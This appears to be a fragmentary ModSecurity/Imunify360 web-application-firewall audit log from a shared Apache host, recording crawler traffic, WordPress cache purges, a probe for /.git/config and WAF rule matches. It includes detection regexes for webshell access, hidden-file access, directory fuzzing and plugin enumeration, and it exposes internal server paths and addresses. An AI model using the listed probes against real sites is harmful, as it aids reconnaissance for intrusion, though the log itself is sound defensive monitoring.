combined=945, p1=95, p2=638, p3=0, p4=0, p5=212, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --cdae3260-Z-- --9c0bad2c-A-- [01/Jul/2025:14:10:13.359611 +0530] aGOe7Tw8s59ZJO7QhWywGAAAACA 20.171.207.232 42434 192.168.74.40 443 --9c0bad2c-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-udaipur/https/js/Rajasthan-Travel-Guides/hotels-in-rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --9c0bad2c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --9c0bad2c-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-udaipur/https/js/Rajasthan-Travel-Guides/hotels-in-rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-udaipur/https/js/Rajasthan-Travel-Guides/hotels-in-rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359213344803 15095 (- - -) Stopwatch2: 1751359213344803 15095; combined=2610, p1=124, p2=2360, p3=0, p4=0, p5=126, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9c0bad2c-Z-- --75e2273f-A-- [01/Jul/2025:14:10:13.817500 +0530] aGOe7fI4K7rYc9V0-PEjrgAAABA 162.243.75.54 58334 192.168.74.40 443 --75e2273f-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --75e2273f-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --75e2273f-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359213764358 53347 (- - -) Stopwatch2: 1751359213764358 53347; combined=3309, p1=99, p2=3073, p3=0, p4=0, p5=137, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --75e2273f-Z-- --4a48e531-A-- [01/Jul/2025:14:10:14.514520 +0530] aGOe7jw8s59ZJO7QhWywGQAAACA 20.171.207.232 42434 192.168.74.40 443 --4a48e531-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/js/aainag/images/Rajasthan-Travel-Guides/Car-Rentals-Ahmedabad.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --4a48e531-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4a48e531-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/js/aainag/images/Rajasthan-Travel-Guides/Car-Rentals-Ahmedabad.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/js/aainag/images/Rajasthan-Travel-Guides/Car-Rentals-Ahmedabad.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-ahmedabad/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359214500201 14602 (- - -) -- Message: Pattern match "(wlwmanifest\\.xml|readme\\.txt|changelog\\.(md|txt)|lang_upload\\.php|arm_widgets_js\\.js|__\\sUPDATES.txt|wpuef-configurator.js)" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1822"] [id "77350207"] [msg "IM360 WAF: WordPress plugins/themes version enumeration||RSV:7.05||RS:302||T:APACHE||REQUEST_URI:/wp-content/plugins/litespeed-cache/readme.txt||"] [severity "NOTICE"] [tag "wp_core"] Stopwatch: 1751359547149629 6364 (- - -) Stopwatch2: 1751359547149629 6364; combined=4563, p1=97, p2=4221, p3=89, p4=2, p5=154, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --e43f2778-Z-- --a58ca820-A-- [01/Jul/2025:14:15:47.664172 +0530] aGOgOuwZi3kMyoeJ-JpqOAAAAAY 103.185.74.40 56398 192.168.74.40 443 --a58ca820-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --a58ca820-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a58ca820-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359546368187 1296311 (- - -) Stopwatch2: 1751359546368187 1296311; combined=2279, p1=70, p2=2010, p3=0, p4=0, p5=199, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a58ca820-Z-- --8c3e4f5f-A-- [01/Jul/2025:14:15:48.611439 +0530] aGOgPIRHp8r7UogtWrscDgAAAEA 20.171.207.232 48242 192.168.74.40 443 --8c3e4f5f-B-- GET /https/aainag/images/testimonials/https/js/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/aainag/payment-mode.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8c3e4f5f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8c3e4f5f-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359548597150 14571 (- - -) Stopwatch2: 1751359548597150 14571; combined=2596, p1=105, p2=2302, p3=0, p4=0, p5=189, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8c3e4f5f-Z-- --94d47035-A-- [01/Jul/2025:14:15:49.081022 +0530] aGOgO0COaY49Xlnpc2xXmgAAACY 103.185.74.40 12709 192.168.74.40 443 --94d47035-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --94d47035-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --94d47035-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751359547874316 1207117 (- - -) Stopwatch2: 1751359547874316 1207117; combined=2109, p1=85, p2=1848, p3=0, p4=0, p5=176, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --94d47035-Z-- --6f261475-A-- [01/Jul/2025:14:15:49.330910 +0530] aGOgPRWscEYPCNueUfZhWQAAAC4 57.141.0.24 45766 192.168.74.40 443 --6f261475-B-- GET /rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/rajasthan-tours-from-delhi/rajasthan-tours-from-agra/images/testimonials/Travel-Tips.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --6f261475-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6f261475-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751360418352718 15936 (- - -) Stopwatch2: 1751360418352718 15936; combined=2547, p1=134, p2=2278, p3=0, p4=0, p5=135, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b6e22648-Z-- --7dd91c0f-A-- [01/Jul/2025:14:30:19.312045 +0530] aGOjoj73sznzUv3KDis9kQAAABM 103.185.74.40 27222 192.168.74.40 443 --7dd91c0f-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --7dd91c0f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --7dd91c0f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751360418245886 1066785 (- - -) Stopwatch2: 1751360418245886 1066785; combined=2337, p1=86, p2=2093, p3=0, p4=0, p5=157, sr=52, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --7dd91c0f-Z-- --d73b0e7f-A-- [01/Jul/2025:14:30:19.548594 +0530] aGOjo_KWq6rZjpBBgPkz1wAAAAM 20.171.207.232 60084 192.168.74.40 443 --d73b0e7f-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/js/Rajasthan-Travel-Guides/images/https/aainag/hotels-jodhpur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --d73b0e7f-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751360420657731 14891 (- - -) Stopwatch2: 1751360420657731 14891; combined=3173, p1=125, p2=2885, p3=0, p4=0, p5=162, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c4bdf46d-Z-- --415c9a36-A-- [01/Jul/2025:14:30:20.714191 +0530] aGOjo126-3NSqC00saN8YwAAADE 103.185.74.40 27175 192.168.74.40 443 --415c9a36-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --415c9a36-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --415c9a36-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751360419524584 1190216 (- - -) Stopwatch2: 1751360419524584 1190216; combined=3117, p1=142, p2=2816, p3=0, p4=0, p5=159, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --415c9a36-Z-- --caf23b06-A-- [01/Jul/2025:14:30:21.261330 +0530] aGOjpdpplWEvvdnrQEfpMgAAAB4 216.24.210.106 37967 192.168.74.40 443 --caf23b06-B-- GET /wp-admin/includes/index.php HTTP/1.1 Host: anandamsanyal.com User-Agent: Go-http-client/1.1 Referer: http://anandamsanyal.com/wp-admin/includes/index.php Accept-Encoding: gzip --caf23b06-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361465358316 19815 (- - -) Stopwatch2: 1751361465358316 19815; combined=4402, p1=199, p2=4045, p3=0, p4=0, p5=158, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9451d42d-Z-- --af8c4f17-A-- [01/Jul/2025:14:47:46.389239 +0530] aGOnus_bYat-bZ6TBnhWCQAAAA0 103.185.74.40 13380 192.168.74.40 443 --af8c4f17-B-- POST /wp-cron.php?doing_wp_cron=1751361466.1595849990844726562500 HTTP/1.1 Host: wordpress.taaffeite.co User-Agent: WordPress/6.8.1; https://wordpress.taaffeite.co Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --af8c4f17-C-- --af8c4f17-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --af8c4f17-H-- Message: Operator EQ matched 1 at TX:trapped. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751361466.1595849990844726562500& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361466372378 17087 (- - -) Stopwatch2: 1751361466372378 17087; combined=5806, p1=157, p2=4927, p3=183, p4=3, p5=536, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --af8c4f17-Z-- --a429be1b-A-- [01/Jul/2025:14:47:47.634962 +0530] aGOnu8_bYat-bZ6TBnhWDQAAAA0 122.169.186.221 64649 192.168.74.40 443 --a429be1b-B-- GET /assets/js/appear.js HTTP/1.1 Host: blackmasti.in Sec-Fetch-Site: same-origin Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Mode: no-cors Accept: */* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/374.0.773146746 Mobile/15E148 Safari/604.1 Referer: https://blackmasti.in/?srsltid=AfmBOoqseXyIY0qw-KUGdwZtkcxUsQlMMwoIp-JDq81e3qfevzr_KLbA Sec-Fetch-Dest: script Accept-Language: en-IN,en;q=0.9 --a429be1b-F-- HTTP/1.1 200 OK Last-Modified: Mon, 04 Oct 2021 19:38:28 GMT -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --648e5652-Z-- --81e0da07-A-- [01/Jul/2025:14:49:36.075054 +0530] aGOoKMFvfMQml3zxomaWqwAAACg 35.203.210.224 60214 192.168.74.40 80 --81e0da07-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. 
If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com Accept-Encoding: gzip --81e0da07-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Transfer-Encoding: chunked Content-Type: text/html --81e0da07-H-- Message: Access denied with code 403 (phase 1). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "121"] [id "77350470"] [msg "IM360 WAF: Vulnerability scanner detected||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 1) Apache-Handler: default-handler Stopwatch: 1751361576072835 2464 (- - -) Stopwatch2: 1751361576072835 2464; combined=486, p1=108, p2=0, p3=0, p4=0, p5=378, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --81e0da07-Z-- --daf6fa46-A-- [01/Jul/2025:14:49:36.231071 +0530] aGOoKMoLkJ8gQ_8oc2rUaQAAAA4 20.171.207.232 46014 192.168.74.40 443 --daf6fa46-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/Rajasthan-Travel-Guides/https/images/js/https/hotels-in-rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --daf6fa46-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --daf6fa46-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/Rajasthan-Travel-Guides/https/images/js/https/hotels-in-rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/Rajasthan-Travel-Guides/https/images/js/https/hotels-in-rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-ahmedabad/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361576216231 15020 (- - -) Stopwatch2: 1751361576216231 15020; combined=2812, p1=124, p2=2559, p3=0, p4=0, p5=128, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361617380337 17080 (- - -) Stopwatch2: 1751361617380337 17080; combined=3228, p1=151, p2=2927, p3=0, p4=0, p5=150, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --5ed74810-Z-- --80973e6a-A-- [01/Jul/2025:14:50:18.139504 +0530] aGOoUBy6sYRnaXXSs7KfWQAAABo 103.185.74.40 52202 192.168.74.40 443 --80973e6a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --80973e6a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --80973e6a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361616573457 1567045 (- - -) Stopwatch2: 1751361616573457 1567045; combined=2351, p1=87, p2=2031, p3=0, p4=0, p5=232, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --80973e6a-Z-- --8a7c5760-A-- [01/Jul/2025:14:50:18.597173 +0530] aGOoUsoLkJ8gQ_8oc2rUjQAAAA4 20.171.207.232 52136 192.168.74.40 443 --8a7c5760-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/Rajasthan-Travel-Guides/aainag/aainag/Car-Rentals-Delhi.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8a7c5760-F-- -- Action: Intercepted (phase 2) Stopwatch: 1751361619309936 5934 (- - -) Stopwatch2: 1751361619309936 5934; combined=1716, p1=148, p2=877, p3=0, p4=0, p5=691, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --43abe907-Z-- --79d8a36a-A-- [01/Jul/2025:14:50:19.385981 +0530] aGOoUqKsWTqEX-__bOWT3gAAAB4 103.185.74.40 54917 192.168.74.40 443 --79d8a36a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --79d8a36a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --79d8a36a-H-- Message: Match of "pm 